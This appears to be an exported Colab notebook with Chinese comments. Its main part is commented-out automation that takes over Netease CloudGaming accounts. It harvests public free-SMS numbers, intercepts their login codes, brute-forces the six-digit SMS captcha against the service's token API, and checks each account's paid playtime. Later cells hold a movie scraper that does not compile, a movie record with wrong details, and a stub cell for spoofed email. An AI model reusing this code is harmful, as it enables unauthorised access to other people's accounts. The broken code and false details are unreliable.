#   driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape > div > button").click();')
# except:
#   print('no ad',end='\r')
# for link in links:
#   fullphone = sub(r'\D*','',link)
#   # login box
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="g-Btn g-Btn-green2"][contains(text(),"登录")]')))
#   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div").click();')
#   # show ctcode list
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="confirm-shade fadein"]/div[@class="cofirm login"]')))
#   driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > div").click();')
#   # get ctcode
#   lis = driver.find_elements_by_xpath('//ul[@class="login-regions"]/li[@class="f12"]')
#   lindex = 0
#   for li in lis:
#     lindex += 1
#     ctcode = int(sub(r'\D*','',li.get_attribute('textContent')))
#     if fullphone.startswith(ctcode)==False:
#       phone = int(sub('^%d'%ctcode,'',fullphone))
#       fakephone = int(phone + 1)
#       break
#   # click ctcode
#   driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > ul > li:nth-child(%d)").click();'%lindex)
#   # get more captcha
#   pindex = 0
#   for i in range(6):
#     # input phone
#     wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="14"]')))
#     if pindex == 0:
#       driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(str(phone))
#       pindex += 1
#     elif pindex == 1:
#       driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(str(fakephone))
#       pindex -= 1
#     # next step
#     wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="g-Btn g-Btn-green2"][contains(text(),"下一步")]')))
#     driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
#     # go back
#     wait.until(EC.presence_of_element_located((By.XPATH,'//i[@class="icon icon-back"]')))
#     driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.login-avatar > i").click();')
#   # get captcha
#   limits=60
#   start=float(time())
#   text = ''
#   while '--Netease CloudGaming' not in text:
#     r = get(link, headers=headers)
#     soup = BeautifulSoup(r.text, 'html.parser')
#     text = str(soup.find('div',class_='card-body').get_text())
#     end=float(time())
#     if end-start >= limits:
#       # skip this one
#       break
#   if end-start >= limits:
#     print('timeout',end='\r')
#     continue
#   # input captcha
#   captcha=sub(r'\D*','',text)
#   wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="6"]')))
#   driver.find_element_by_xpath('//input[@type="tel"][@maxlength="6"]').send_keys(captcha)
#   # print('检查是否同意协议',end='\r')
#   cla=str(driver.find_element_by_xpath('//i[@class="icon icon-check"]/../..').get_attribute('class'))
#   if cla!='radio on':
#     driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.radio > div > i").click();')
#   # login
#   driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.g-Btn.g-Btn-green2").click();')
#   # del ad
#   try:
#     wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
#     driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape").style="display:none";')
#   except:
#     pass
#   # click pc time
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="vipcard-tab"]/span[contains(text(),"端游充值")]')))
#   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > div.vipcard.pc > div.vipcard-top > div:nth-child(2) > span").click();')
#   # get pc time
#   pctime=str(('//div[@class="vipcard other pc"]/div[@class="vipcard-bottom"]/div[@class="vipcard-bar f12"]/div[@class="bar-left"]').get_attribute('textContent'))
#   print(pctime,href)
#   # logout
#   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > ul > li:nth-child(4)").click();')
#   # confirm logout
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="cofirm"]/div[@class="cofirm-cont"]/div[@class="cofirm-btns double"]/a[@class="g-Btn g-Btn-green2"]')))
#   driver.execute_script('document.querySelector("body > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2").click();')
# driver.quit()
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
#########################################################################################################################################################
# # r = get('https://tw.yahoo.com/')
# # soup = BeautifulSoup(r.text, 'html.parser')
# # stories = soup.find_all('a', class_='story-title')
# # 获取所有手机号码链接
# hrefs=[]
# for page in range(1,4):
#   # driver.get('https://getfreesmsnumber.com/?page=%s'%page)
#   # links = driver.find_elements_by_xpath('//div[@class="col-12 col-lg-3 col-md-4 col-sm-6 p-2"]//a')
#   # for link in links:
#   #   hrefs.append(link.get_attribute('href'))
#   r = get('https://getfreesmsnumber.com/?page=%s'%page, headers=headers)
#   soup = BeautifulSoup(r.text, 'html.parser')
#   # links = soup.select('body > div.container > div > div > div > div > div.card-text > a')
#   links = soup.find_all('a',href=compile('/virtual-phone/p-\d*'))
#   for link in links:
#     href=link['href'].replace(' ','')
#     href='https://getfreesmsnumber.com%s'%href
#     # print('all:',href)
#     if href not in hrefs:
#       hrefs.append(href)
# # 检测号码是否在线(非月份,或只允许分秒)
# nhrefs=[]
# for href in hrefs:
#   # driver.get(href)
#   # wait.until(EC.presence_of_element_located((By.XPATH,'//footer[@class="blockquote-footer float-right"]')))
#   # date = driver.find_element_by_xpath('//footer[@class="blockquote-footer float-right"]').get_attribute('textContent')
#   # href='https://getfreesmsnumber.com%s'%href
#   r = get(href, headers=headers)
#   soup = BeautifulSoup(r.text, 'html.parser')
#   # try:
#   # date = str(soup.select_one('body > div.container > div > div.col-md-6.text-center > div > div.card-body > footer.blockquote-footer.float-right').get_text())
#   date = str(soup.find('footer',class_=compile('.*blockquote-footer.*')).get_text())
#   # except:
#   #   continue
#   if ('seconds' in date) or ('minutes' in date) or ('hours' in date):
#     nhrefs.append(href)
#     # print('online:',href)
#     print(href)

# # ontxt=open('on.txt','w')
# # # ontxt.write("\r".join(nhrefs))
# # ontxt.write("\r".join(hrefs))





# # with open('on.txt','r') as ontxt:
# #   nhrefs=ontxt.read().split()

# driver.get('https://cg.163.com/#/pc')
# # wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="nav-userinfo"]/div[@class="g-Btn g-Btn-green2"][contains(text(),"登录")]')))
# # del ad
# try:
#     wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
#     driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape").setAttribute("style", "display:none");')
# except:
#     print('无广告',end='\r')
# for href in nhrefs:
# # for href in hrefs:
# #   # driver.switch_to.window(driver.window_handles[0])
# #   print('进入网易云游戏',end='\r')
# #   driver.get('https://cg.163.com/#/pc')
# #   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="nav-userinfo"]/div[@class="g-Btn g-Btn-green2"][contains(text(),"登录")]')))
# #   try:
# #     # print('等待广告加載完畢')
# #     # wait.until(EC.presence_of_element_located((By.XPATH,'//button[@class="slide-close"]')))
# #     print('删除广告',end='\r')
# #     driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape > div > button").click()')
# #   # except TimeoutException as identifier:
# #   except:
# #     # pass
# #     # print('无广告',identifier,end='\r')
# #     print('无广告',end='\r')
# #   driver.implicitly_wait(3)
# #   print('点击登录',end='\r')
# #   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div").click()')
# #   driver.implicitly_wait(3)
# #   print('显示所有地区号码列表',end='\r')
# #   # driver.execute_script('document.querySelector("div.login-region.f12").click()')
# #   driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > div").click()')
# #   driver.implicitly_wait(3)
# #   print('所有地区列表',end='\r')
# #   lis=driver.find_elements_by_xpath('//ul[@class="login-regions"]/li[@class="f12"]')
# #   for li in lis:
# #     loca=sub(r'\D*','',li.get_attribute('textContent'))
# #     phone=str(sub(r'\D*','',href))
# #     if phone.startswith(str(loca)):
# #       lophone=phone.replace(str(loca),'')
# #       print(loca,lophone)
# #       driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > ul > li:nth-child(%d)").click()'%(lis.index(li)+1))
# #       driver.implicitly_wait(3)
# #       print('输入手机号码',end='\r')
# #       # driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > input[type=tel]").value=%s'%str(lophone))
# #       driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(lophone)
# #       driver.implicitly_wait(3)
# #       print('下一步',end='\r')
# #       driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click()')
# #       driver.implicitly_wait(3)
# #       print('查看验证码',end='\r')
# #       # driver.execute_script('window.open("%s");'%href)
# #       # print(driver.current_window_handle,driver.window_handles[-1],'all:',driver.window_handles)
# #       # driver.switch_to.window(driver.window_handles[-1])
# #       # code=0
# #       # for i in range(12):
# #       #   try:
# #       #     print('检查文字有无netesae',end='\r')
# #       #     wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="card-body"][contains(text(),"--Netease CloudGaming")]')))
# #       #     text=driver.find_element_by_xpath('//div[@class="card-body"][contains(text(),"--Netease CloudGaming")]').get_attribute('textContent')
# #       #     code=sub(r'\D*','',text)
# #       #     print('code:',code)
# #       #     driver.close()
# #       #     break
# #       #   except:
# #       #     driver.refresh()
# #       # if code==0:
# #       #   continue
# #       # print(driver.current_window_handle,driver.window_handles[-1],'all:',driver.window_handles)
# #       # print(driver.current_window_handle)
# #       # driver.switch_to.window(driver.window_handles[0])
# #       ######
# #       start=float(time())
# #       text=''
# #       while '--Netease CloudGaming' not in text:
# #         end=float(time())
# #         if end-start >= 10:
# #           break
# #         r = get(href, headers=headers)
# #         soup = BeautifulSoup(r.text, 'html.parser')
# #         text = soup.select_one('body > div.container > div > div.col-md-6.text-center > div > div.card-body').get_text()
# #       else:
# #         code=sub(r'\D*','',text)
# #         print('code:',code)
# #       if end-start >= 10:
# #         continue
# #       ######
# #       print('输入验证码',end='\r')
# #       driver.find_element_by_xpath('//input[@type="tel"][@maxlength="6"]').send_keys(code)
# #       driver.implicitly_wait(3)
# #       print('检查是否同意协议',end='\r')
# #       cla=driver.find_element_by_xpath('//i[@class="icon icon-check"]/../..').get_attribute('class')
# #       if cla!='radio on':
# #         driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.radio > div > i").click()')
# #       driver.implicitly_wait(3)
# #       print('登录',end='\r')
# #       driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.g-Btn.g-Btn-green2").click();')
# #       driver.implicitly_wait(3)
# #       try:
# #         # print('等待广告加載完畢')
# #         # wait.until(EC.presence_of_element_located((By.XPATH,'//button[@class="slide-close"]')))
# #         print('删除广告',end='\r')
# #         driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape > div > button").click()')
# #       # except TimeoutException as identifier:
# #       except:
# #         # pass
# #         # print('无广告',identifier,end='\r')
# #         print('无广告',end='\r')
# #       driver.implicitly_wait(3)
# #       # 查看个人资料
# #       print('查看个人资料',end='\r')
# #       input()
# #       # ActionChains(driver).move_to_element(driver.find_element_by_xpath('//div[@class="user-avatar"]/img[@class="avatar-img"]')).perform()
# #       # ActionChains(driver).move_to_element(driver.find_element_by_xpath('//div[@class="user-avatar"]')).perform()
# #       driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog").style="";')
# #       driver.implicitly_wait(3)
# #       # 查看pc时间
# #       print('查看pc时间',end='\r')
# #       driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > div.vipcard.pc > div.vipcard-top > div:nth-child(2) > span").click();')
# #       driver.implicitly_wait(3)
# #       # 查看时间
# #       print('查看时间',end='\r')
# #       time=str(driver.find_element_by_xpath('//div[@class="vipcard-bottom"]//div[@class="bar-left"]').get_attribute('textContent'))
# #       if ('端游充值优惠进行中' not in time) or ('请及时续费' not in time):
# #         print(time,href)
# #         with open('useing.txt','w') as t:
# #           t.write('%s:%s\r'%(href,time))
# #       # 退出登录
# #       print('退出登录',end='\r')
# #       driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > ul > li:nth-child(4)").click()')
# #       driver.implicitly_wait(3)
# #       # 确认退出
# #       print('确认退出',end='\r')
# #       driver.execute_script('document.querySelector("body > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2").click()')
# #       break
#   # show login box
#   driver.execute_script('document.querySelector("#app > div.confirm-shade").setAttribute("class", "confirm-shade fadein");document.querySelector("#app > div.confirm-shade").style=undefined;')
#   # wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="confirm-shade fadein"]')))
#   wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[contains(@class,"confirm-shade")]')))
#   # show number list
#   driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > div").click();')
#   wait.until(EC.presence_of_element_located((By.XPATH,'//ul[@class="login-regions"]/li[@class="f12"]')))
#   # loop number list
#   locas=driver.find_elements_by_xpath('//ul[@class="login-regions"]/li[@class="f12"]')
#   loindex=0
#   for loca in locas:
#     loindex+=1
#     loca=str(sub(r'\D*','',loca.get_attribute('textContent')))
#     phone=str(sub(r'\D*','',href))
#     if phone.startswith(loca):
#       break
#   if phone.startswith(loca)==False:
#     continue
#   realo = str(driver.find_element_by_xpath('//ul[@class="login-regions"]/li[%d]'%loindex).get_attribute('textContent'))
#   # lophone=phone.replace(loca,'')
#   lophone=sub('^%s'%loca,'',phone)
#   fakephone=lophone.replace('1','2').replace('0','5')
#   print(loindex,realo,phone,loca,lophone,fakephone)
#   # select loca
#   driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(1) > div.f14.input > ul > li:nth-child(%d)").click();'%loindex)
#   for i in range(4):
#     # input full number
#     # try:
#     driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(lophone)
#     # except:
#     #   print('input number failed')
#     #   continue
#     # next step
#     driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
#     # back
#     driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.login-avatar > i").click();')
#     # input full number
#     driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(fakephone)
#     # next step
#     driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
#     # input full number
#     # try:
#     driver.find_element_by_xpath('//input[@type="tel"][@maxlength="14"]').send_keys(lophone)
#     # except:
#     #   print('input number failed')
#     #   continue
#     # next step
#     driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(1) > div.g-Btn.g-Btn-green2").click();')
#   # get code
#   limits=60
#   start=float(time())
#   text=' "errcode":1302 '
#   num = 0
#   tcode='%06d'%num
#   data = {'auth_method':'phone-captcha','captcha':'%s'%tcode,'ctcode':'%s'%loca,'phone':'%s'%lophone}
#   print(data)
#   # while '--Netease CloudGaming' not in text:
#   while '"errcode":1302' in text:
#     tcode='%06d'%num
#     end=float(time())
#     # if end-start >= limits:
#     #   break # skip this one
#     x = post('https://n.cg.163.com/api/v1/tokens', data = data,headers = headers)
#     # soup = BeautifulSoup(r.text, 'html.parser')
#     # text = str(soup.select_one('body > div.container > div > div.col-md-6.text-center > div > div.card-body').get_text())
#     # text = str(soup.find('div',class_='card-body').get_text())
#     text = x.text
#     num+=1
#   # else:
#   # if '--Netease CloudGaming' in text:
#     # code=sub(r'\D*','',text)
#   print(text)
#   code=tcode
#   print('code:',code,'data:',data)
#   # elif end-start >= limits:
#   #   print('timeout')
#   #   continue
#   # print('检查是否同意协议',end='\r')
#   cla=str(driver.find_element_by_xpath('//i[@class="icon icon-check"]/../..').get_attribute('class'))
#   if cla!='radio on':
#     driver.execute_script('document.querySelector("#app > div.confirm-shade.fadein > div > div.cofirm-cont > div > div:nth-child(2) > div.radio > div > i").click();')
#   # input code
#   wait.until(EC.presence_of_element_located((By.XPATH,'//input[@type="tel"][@maxlength="6"]')))
#   try:
#     driver.find_element_by_xpath('//input[@type="tel"][@maxlength="6"]').send_keys(code)
#   except:
#     print('input code falied')
#     continue
#   # login
#   driver.execute_script('document.querySelector("#app > div:nth-child(4) > div > div.cofirm-cont > div > div:nth-child(2) > div.g-Btn.g-Btn-green2").click();')
#   # del ad
#   try:
#     wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="app"]/div[@class="slide confirm-shade popup landscape"]')))
#     driver.execute_script('document.querySelector("#app > div.slide.confirm-shade.popup.landscape").style="display:none";')
#   except:
#     pass
#   # click pc time
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="vipcard-tab"]/span[contains(text(),"端游充值")]')))
#   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > div.vipcard.pc > div.vipcard-top > div:nth-child(2) > span").click();')
#   # get pc time
#   pctime=str(('//div[@class="vipcard other pc"]/div[@class="vipcard-bottom"]/div[@class="vipcard-bar f12"]/div[@class="bar-left"]').get_attribute('textContent'))
#   # if '端游充值优惠进行中' in pctime:
#   #   pass
#   # elif '请及时续费' in pctime:
#   #   pass
#   # else:
#   #   print(pctime,href)
#   #   with open('useing.txt','w',encoding='utf-8') as t:
#   #     t.write('%s---%s\r'%(href,pctime))
#   print(pctime,href)
#   with open('useing.txt','w',encoding='utf-8') as t:
#     t.write('%s---%s\r'%(href,pctime))
#   # logout
#   driver.execute_script('document.querySelector("#app > header > div > div > div.nav-con > div.nav-userinfo > div.nav-userinfo-item.nav-user-center > div.nav-dialog > div > ul > li:nth-child(4)").click();')
#   # confirm logout
#   wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="cofirm"]/div[@class="cofirm-cont"]/div[@class="cofirm-btns double"]/a[@class="g-Btn g-Btn-green2"]')))
#   driver.execute_script('document.querySelector("body > div.confirm-shade.fadein > div > div > div.cofirm-btns.double > a.g-Btn.g-Btn-green2").click();')
# driver.quit()
# '''

# 1
# Request URL: https://n.cg.163.com/api/v1/phones-registered/1-2016139947
# Request Method: GET
# Status Code: 200 OK
# Remote Address: 42.186.120.168:443
# Referrer Policy: strict-origin-when-cross-origin

# GET /api/v1/phones-registered/1-2016139947 HTTP/1.1
# Host: n.cg.163.com
# Connection: keep-alive
# sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
# Accept: application/json, text/plain, */*
# X-Platform: 0
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
# Origin: https://cg.163.com
# Sec-Fetch-Site: same-site
# Sec-Fetch-Mode: cors
# Sec-Fetch-Dest: empty
# Referer: https://cg.163.com/
# Accept-Encoding: gzip, deflate, br
# Accept-Language: zh-TW,zh;q=0.9

# 2
# Request URL: https://n.cg.163.com/api/v1/phone-captchas/1-2016139947
# Request Method: POST
# Status Code: 200 OK
# Remote Address: 42.186.120.168:443
# Referrer Policy: strict-origin-when-cross-origin

# POST /api/v1/phone-captchas/1-2016139947 HTTP/1.1
# Host: n.cg.163.com
# Connection: keep-alive
# Content-Length: 0
# sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
# Accept: application/json, text/plain, */*
# X-Platform: 0
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
# Origin: https://cg.163.com
# Sec-Fetch-Site: same-site
# Sec-Fetch-Mode: cors
# Sec-Fetch-Dest: empty
# Referer: https://cg.163.com/
# Accept-Encoding: gzip, deflate, br
# Accept-Language: zh-TW,zh;q=0.9

# 3
# Request URL: https://n.cg.163.com/api/v1/tokens
# Request Method: POST
# Status Code: 200 OK
# Remote Address: 42.186.120.168:443
# Referrer Policy: strict-origin-when-cross-origin

# POST /api/v1/tokens HTTP/1.1
# Host: n.cg.163.com
# Connection: keep-alive
# Content-Length: 471
# sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
# Accept: application/json, text/plain, */*
# X-Platform: 0
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
# Content-Type: application/json;charset=UTF-8
# Origin: https://cg.163.com
# Sec-Fetch-Site: same-site
# Sec-Fetch-Mode: cors
# Sec-Fetch-Dest: empty
# Referer: https://cg.163.com/
# Accept-Encoding: gzip, deflate, br
# Accept-Language: zh-TW,zh;q=0.9
# reheaders={'''
# Accept: application/json, text/plain, */*
# Accept-Encoding: gzip, deflate, br
# Accept-Language: zh-TW,zh;q=0.9
# Connection: keep-alive
# Host: n.cg.163.com
# Origin: https://cg.163.com
# Referer: https://cg.163.com/
# sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
# sec-ch-ua-mobile: ?0
# Sec-Fetch-Dest: empty
# Sec-Fetch-Mode: cors
# Sec-Fetch-Site: same-site
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
# X-Platform: 0
# '''}
# capheaders={'''
# Accept: application/json, text/plain, */*
# Accept-Encoding: gzip, deflate, br
# Accept-Language: zh-TW,zh;q=0.9
# Connection: keep-alive
# Content-Length: 0
# Host: n.cg.163.com
# Origin: https://cg.163.com
# Referer: https://cg.163.com/
# sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
# sec-ch-ua-mobile: ?0
# Sec-Fetch-Dest: empty
# Sec-Fetch-Mode: cors
# Sec-Fetch-Site: same-site
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
# X-Platform: 0
# '''}
# toheaders={
#     "auth_method":"phone-captcha",
#     "ctcode":"1","phone":"2013897327",
#     "captcha":"123456",
#     "device_info":{
#         "userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36",
#         "appVersion":"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36",
#         "codecs":["vp8","rtx","vp9","vp9","vp9","h264","h264","h264","h264","av1x","h264","h264","red","ulpfec","flexfec-03"]
#         }
#       }
# # {"auth_method":"phone-captcha","ctcode":"1","phone":"2016139947","captcha":"942180","device_info":{"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36","appVersion":"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36","codecs":["vp8","rtx","vp9","vp9","vp9","h264","h264","h264","h264","av1x","h264","h264","red","ulpfec","flexfec-03"]}}
# registered=get('https://n.cg.163.com/api/v1/phones-registered/%s-%s'%(ctcode,phone),headers=reheaders)
# output={"ctcode":"1","phone":"2013897327"}
# captchas=post('https://n.cg.163.com/api/v1/phone-captchas/%s-%s'%(ctcode,phone),headers=capheaders)
# output={}
# post('https://n.cg.163.com/api/v1/tokens',headers=toheaders)
# output={data: {}, errcode: 1102, errmsg: "invalid phone captcha", errmsgcn: "短信验证码错误"}

NameError: ignored

# 电影爬虫

In [ ]:
#@title 爬取電影資源 { vertical-output: true, display-mode: "form" }
# mode:https://video.friday.tw/
# 原名,片長,產地,上映,簡介,劇照 https://zh.wikipedia.org/w/index.php?search={title}電影
# 票房 https://www.boxofficemojo.com/search/?q={en-title}
# IMDb評分 https://www.imdb.com/find?q={en-title}
# 豆瓣評分,分類,IMDb鏈接 https://search.douban.com/movie/subject_search?search_text={title}

#@markdown 流程:
#@markdown 1. 電影缐上看網站==>劇照,標題,m3u8
#@markdown 2. wiki搜索標題==>劇照,原名,上映,導演,主演,產地,片長,簡介
#@markdown 3. 豆瓣搜索原名==>評分,分類,IMDb鏈接,簡介(簡繁)
#@markdown 4. IMDb==>評分,英名
#@markdown 5. 全球票房搜索英名==>票房[必須相符]
!pip install opencc-python-reimplemented #簡繁體
# from opencc import OpenCC
# cc = OpenCC('s2hk')
# text = '投票當天需攜帶投票通知單、國民身分證及印章，若沒有收到投票通知書，可以向戶籍所在地鄰長查詢投票所，印章則是可以用簽名代替，至於身分證則是一定要攜帶。'
# print(cc.convert(text))
from re import compile
from requests import get,codes
from bs4 import BeautifulSoup

movies=[]

page_num=1
webs_index=0
while True:
    if webs_index=0:
        # Movieffm
        r = get('https://www.movieffm.net/movies/page/%d/'%(page_num), params = {'orderby':'view'})
    elif webs_index=1:
        # 劇迷Gimy小鴨影音
        r = get('http://www.135mov.com/movie/p%d.html'%(page_num))
    elif webs_index=2:
        # MaoMe 小貓影音
        r = get('https://maome.tv/genre/movies---%d.html'%(page_num))
    else:
        break
    page_num+=1
    # 連綫不成功
    if r.status_code != codes.ok:
        webs_index+=1
    soup = BeautifulSoup(r.text, 'html.parser')

if webs_index=0:
    for box in soup.find_all('a',attrs={'href':compile('^https://www.movieffm.net/movies/[\w-]/$')}):
        b=get(box.get('href'))
        soup = BeautifulSoup(b.text, 'html.parser')
        info={}
        info[title]=soup.find('#single > div.content.right > div.sheader > div.data > h1').string
        info[posters]=[]
        info[posters].append(soup.find('#single > div.content.right > div.sheader > div.poster > img').get('src'))
        info[m3u8]=[]
        info[m3u8].append()
elif webs_index=1:
    # 劇迷Gimy小鴨影音
    r = requests.get('http://www.135mov.com/movie/p%d.html'%(page_num))
elif webs_index=2:
    # MaoMe 小貓影音
    r = requests.get('https://maome.tv/genre/movies---%d.html'%(page_num))

In [ ]:
#@title database-js樣式 { vertical-output: true, display-mode: "form" }
%%javascript
movies=[
    {
        title:"復仇者聯盟：終局之戰",
        origin:"Avengers: Endgame",
        en-title:"Avengers: Endgame",
        posters:[
            'https://zh.wikipedia.org/wiki/File:Avengers_Endgame_Poster.jpg',
            'https://cnet1.cbsistatic.com/img/8hCTVdv5PbjQe3QwbS17Sw9CTPo=/1200x675/2019/04/25/9277c764-601d-4ab3-85f9-9c39d7f1ac5a/avengers-endgame-promo-crop.jpg',
        ],
        boxoffice:-1,
        rating:6.7,
        types:['科幻','奇幻'],
        release:'2020/06/01',
        director:['美國隊長'],
        starring:['老賈','托尼'],
        country:'美國',
        length:181,//mins
        introduce:'《復仇者聯盟：終局之戰》（英語：Avengers: Endgame）是一部於2019年上映的美國史詩超級英雄電影，改編自漫威漫畫旗下的超級英雄團隊復仇者聯盟，由漫威影業製作及華特迪士尼工作室電影發行。本片為2018年電影《復仇者聯盟：無限之戰》的續集，同時也是漫威電影宇宙（MCU）系列的第22部電影作品[4]。此電影由羅素兄弟執導，及由史蒂芬·麥費利與克里斯多佛·馬庫斯負責撰寫劇本。電影主演包括小勞勃·道尼、克里斯·伊凡、馬克·盧法洛、克里斯·漢斯沃、史嘉蕾·喬韓森、傑瑞米·雷納、唐·奇鐸、保羅·路德、布麗·拉森、凱倫·吉蘭、達娜·古瑞拉、布萊德利·庫柏和喬許·布洛林。克里斯·伊凡表示，本片將是他最後一部漫威宇宙系列的電影。電影中，復仇者聯盟中的倖存成員與他們的盟友共同努力以扭轉薩諾斯在無限之戰中所造成的傷害。',
        m3u8:[
            '',
        ],
    },
]

# Function

In [ ]:
#@title 網頁display { vertical-output: true, display-mode: "form" }
from IPython.display import HTML
display(HTML('''

'''))

In [ ]:
#@title 挂載雲端 { vertical-output: true, display-mode: "form" }
from google.colab import drive
drive.mount('/content/drive')
%cd drive/MyDrive/Colab\ Notebooks
# movie.js

Mounted at /content/drive
/content/drive/MyDrive/Colab Notebooks


# 自动邮件

In [ ]:
#@title Auto send Email Fake: https://emkei.cz/ { vertical-output: true, display-mode: "form" }
#@markdown From name: fromname\
#@markdown From e-mail: from\
#@markdown {To}: rcpt\
#@markdown Click Subject: subject\
#@markdown html: html\
#@markdown Text: text
# !apt -q -qq update
# !apt -q -qq install chromium-chromedriver
# !pip -q install selenium
# from google.colab import output
